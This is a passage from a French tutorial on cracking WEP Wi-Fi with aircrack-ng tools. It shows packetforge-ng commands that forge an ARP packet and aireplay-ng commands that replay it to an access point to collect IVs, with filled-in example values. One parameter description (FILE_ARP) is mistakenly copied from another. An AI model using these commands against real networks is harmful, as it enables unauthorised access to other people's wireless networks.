GÉNÉRER UN PACKET ARP VALIDE AVEC PACKETFORGE-NG : (UNIQUEMENT SI VOUS AVEZ UTILISÉ LA MÉTHODE CHOPCHOP OU FRAGMENTATION)

Une fois que l'attaque chopchop ou fragmentation a enregistré les deux fichiers .xor et .cap, nous allons pouvoir créer un packet ARP valide pour ensuite le renvoyer au routeur pour  obtenir des IVS.

Voici la commande :

packetforge-ng -0 -a MAC_AP -h MAC_PC -k 192.168.1.1 -l 255.255.255.255 -y FILE_XOR -w FILE.cap

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
FILE_XOR : Nom du fichier xor précédemment enregistré
FILE.cap : Nom du fichier à enregistrer.

Ainsi dans notre exemple cela donnera :

packetforge-ng -0 -a 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -k 192.168.1.1 -l 255.255.255.255 -y replay_dec-0212-224255.xor -w arp.cap

Notes : Le paramètre k permet de définir l'ip distante soit ici dans la plupart des cas l'adresse ip du routeur soit : 192.168.1.1. Dans certain cas, vous pouvez aussi utiliser l'adresse IP 255.255.255.255 pour les deux paramètres -k et -l


RENVOI DU PACKET ARP :
(UNIQUEMENT SI VOUS AVEZ UTILISÉ LA MÉTHODE CHOPCHOP OU FRAGMENTATION)

Lorsque vous avez votre fichier arp.cap créer par packetforge-ng, vous pouvez maintenant le renvoyer au routeur via aireplay-ng. Ainsi ce fichier ARP valide permettra d'obtenir des IVS.

Très important, le programme airodump-ng doit être en fonctionnement et enregistrer les données.
(Voir plus haut dans la partie capture des données wifi)

Voici la commande :

aireplay-ng -3 -b MAC_AP -h MAC_PC -r FILE_ARP -x PACKETS/S INTERFACE

MAC_AP : L'adresse mac du point d'accès
MAC_PC : L'adresse mac de votre carte wifi
INTERFACE : Interface de votre carte wifi (eth0 ... )
FILE_ARP : L'adresse mac du point d'accès
PACKETS/S : Détermine la vitesse de transmission des packets, il est important de déterminer ce chiffre, car il permet de réduire les plantages du programme dû à l'injection trop rapide des données sur le réseau wifi. Plus le point d'accès sera éloigné, plus il faudra réduire ce nombre, valeurs optimales entre 50 et 200

Ainsi dans notre exemple cela donnera :
aireplay-ng -3 -b 13:28:11:75:E7:08 -h 00:0C:22:22:E2:69 -r arp.cap -x 100 eth0Note : Le fonctionnement reste le même que vu plus haut, normalement le nombre de PPS doit monter (en fonction bien sur de votre vitesse de transmission -x